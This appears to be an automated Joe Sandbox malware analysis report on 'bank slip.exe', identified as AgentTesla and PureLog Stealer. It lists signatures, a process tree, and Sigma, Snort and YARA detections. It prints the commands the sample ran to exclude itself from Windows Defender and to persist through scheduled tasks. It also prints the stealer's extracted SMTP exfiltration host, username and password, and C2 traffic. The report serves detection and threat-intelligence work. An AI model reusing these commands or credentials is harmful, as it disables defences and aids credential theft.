Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bank slip.exe

Overview

General Information

Sample name:bank slip.exe
Analysis ID:1436607
MD5:64ff7f01e8a040dd0708d0d3c72a09f7
SHA1:71d66159d1414876a6ae19696a5a3d99fc5df6a6
SHA256:0eb53728acb5e4b7c857ed35dacc4ba1264249cada90f5e69d3fde4e9b243190
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • bank slip.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\bank slip.exe" MD5: 64FF7F01E8A040DD0708D0D3C72A09F7)
    • powershell.exe (PID: 5016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7484 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3856 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • mKSjGvfmIulVB.exe (PID: 7552 cmdline: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe MD5: 64FF7F01E8A040DD0708D0D3C72A09F7)
    • schtasks.exe (PID: 7640 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7684 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • GUIVTme.exe (PID: 7860 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • GUIVTme.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.vw-rmplcars.co.in", "Username": "account.sw@vw-rmplcars.co.in", "Password": "Gagan#456"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.3246056841.0000000003092000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2074900045.0000000006750000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000009.00000002.2091471993.0000000003042000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 24 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.bank slip.exe.260f66c.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                11.2.mKSjGvfmIulVB.exe.304f6b4.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.bank slip.exe.6750000.10.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.bank slip.exe.6750000.10.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      11.2.mKSjGvfmIulVB.exe.33cd7dc.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 36 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", ProcessId: 5016, ProcessName: powershell.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUIVTme
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", ProcessId: 5016, ProcessName: powershell.exe
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe, ParentImage: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe, ParentProcessId: 7552, ParentProcessName: mKSjGvfmIulVB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp", ProcessId: 7640, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 111.118.215.27, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7292, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", ProcessId: 3856, ProcessName: schtasks.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", ProcessId: 5016, ProcessName: powershell.exe

                        Persistence and Installation Behavior

                        barindex
                        Sigma detected: Scheduled temp file as task from temp location
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", ProcessId: 3856, ProcessName: schtasks.exe

                        Snort Signatures

                        Timestamp:05/06/24-08:13:10.302990
                        SID:2030171
                        Source Port:49712
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:12:59.940556
                        SID:2851779
                        Source Port:49710
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:12:59.940511
                        SID:2030171
                        Source Port:49710
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:13:10.303039
                        SID:2855542
                        Source Port:49712
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:13:10.303039
                        SID:2855245
                        Source Port:49712
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:13:10.303039
                        SID:2851779
                        Source Port:49712
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:13:10.303039
                        SID:2840032
                        Source Port:49712
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:12:59.940511
                        SID:2839723
                        Source Port:49710
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:12:59.940556
                        SID:2840032
                        Source Port:49710
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:12:59.940556
                        SID:2855542
                        Source Port:49710
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:12:59.940556
                        SID:2855245
                        Source Port:49710
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/06/24-08:13:10.302990
                        SID:2839723
                        Source Port:49712
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.vw-rmplcars.co.in", "Username": "account.sw@vw-rmplcars.co.in", "Password": "Gagan#456"}
                        Multi AV Scanner detection for domain / URL
                        Source: vw-rmplcars.co.inVirustotal: Detection: 10%Perma Link
                        Source: http://vw-rmplcars.co.inVirustotal: Detection: 10%Perma Link
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeReversingLabs: Detection: 23%
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeVirustotal: Detection: 38%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: bank slip.exeReversingLabs: Detection: 23%
                        Source: bank slip.exeVirustotal: Detection: 33%Perma Link
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: bank slip.exeJoe Sandbox ML: detected
                        Source: bank slip.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: bank slip.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: NjBW.pdb source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr
                        Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 0000000F.00000000.2169045059.0000000000EC2000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
                        Source: Binary string: NjBW.pdbSHA256 source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr
                        Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 0000000F.00000000.2169045059.0000000000EC2000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_06A10125
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 4x nop then jmp 06A13F4Ah0_2_06A13556
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 4x nop then jmp 076231BAh11_2_076227C6
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_07620125

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49710 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49710 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49710 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49710 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49710 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49710 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49712 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49712 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49712 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49712 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49712 -> 111.118.215.27:587
                        Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49712 -> 111.118.215.27:587
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE
                        Source: global trafficTCP traffic: 192.168.2.5:49710 -> 111.118.215.27:587
                        Source: Joe Sandbox ViewIP Address: 111.118.215.27 111.118.215.27
                        Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                        Source: global trafficTCP traffic: 192.168.2.5:49710 -> 111.118.215.27:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.vw-rmplcars.co.in
                        Source: bank slip.exe, mKSjGvfmIulVB.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                        Source: bank slip.exe, mKSjGvfmIulVB.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                        Source: RegSvcs.exe, 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.vw-rmplcars.co.in
                        Source: bank slip.exe, mKSjGvfmIulVB.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                        Source: bank slip.exe, 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mKSjGvfmIulVB.exe, 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: RegSvcs.exe, 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vw-rmplcars.co.in
                        Source: bank slip.exe, 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mKSjGvfmIulVB.exe, 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: bank slip.exe, mKSjGvfmIulVB.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, xljC6U.cs.Net Code: vThHZOOISq
                        Source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, xljC6U.cs.Net Code: vThHZOOISq

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_0259E47C0_2_0259E47C
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_04BA7C980_2_04BA7C98
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_04BA7C700_2_04BA7C70
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_04BA09200_2_04BA0920
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_04BA09100_2_04BA0910
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068A6A000_2_068A6A00
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068AAB600_2_068AAB60
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068A003F0_2_068A003F
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068A00400_2_068A0040
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068AC1900_2_068AC190
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_06A147B80_2_06A147B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012CA3E89_2_012CA3E8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012CD7809_2_012CD780
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012C98109_2_012C9810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012C4AC89_2_012C4AC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012C3EB09_2_012C3EB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012C41F89_2_012C41F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_063932789_2_06393278
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_063942889_2_06394288
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0639E0309_2_0639E030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0639C0209_2_0639C020
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_063900409_2_06390040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06398EC09_2_06398EC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06395A109_2_06395A10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_063953309_2_06395330
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_063939909_2_06393990
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 11_2_0544E47C11_2_0544E47C
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 11_2_074BAB6011_2_074BAB60
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 11_2_074B6A0011_2_074B6A00
